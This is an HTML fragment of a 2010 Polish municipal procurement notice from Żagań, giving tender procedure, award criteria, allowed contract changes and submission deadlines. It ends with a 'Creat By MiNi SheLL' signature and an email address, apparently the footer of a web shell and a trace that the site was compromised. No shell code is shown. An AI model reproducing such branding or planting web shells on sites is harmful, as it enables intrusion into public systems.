</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający - na podstawie art.144 ust.1 i 2 Ustawy Prawo zamówień
    publicznych dopuszcza możliwość  zmian postanowień zawartej umowy  
    w stosunku do treści oferty na podstawie, której dokonano wyboru 
    Wykonawcy: 
    w zakresie wydłużenia terminu obowiązywania umowy, pod warunkiem że:    
    - w czasie realizacji przedmiotu umowy wystąpią  okoliczności związane z 
    przedłużającym się  rozstrzygnięciem    organów /decyzja, uzgodnienia, 
    pozwolenie itp./, od rozstrzygnięcia których uzależniona jest prawidłowa  
    realizacja przedmiotu umowy.  Wykonawca w takiej sytuacji jest zobowiązany 
    dochować   należytej staranności, występując o rozstrzygnięcie /decyzja, 
    uzgodnienie, pozwolenie, itp./  do tych organów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zagan.pl    / przetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żagań, 68-100 Żagań, Plac Słowiański 17, pok. nr 26 / Wydział Kontroli i Zamówień Publicznych/ - na pisemny wniosek Wykonawcy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2010 godzina 11:00, miejsce: Urząd Miasta Żagań, 68-100 Żagań, Plac Słowiański 17, pok. nr 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com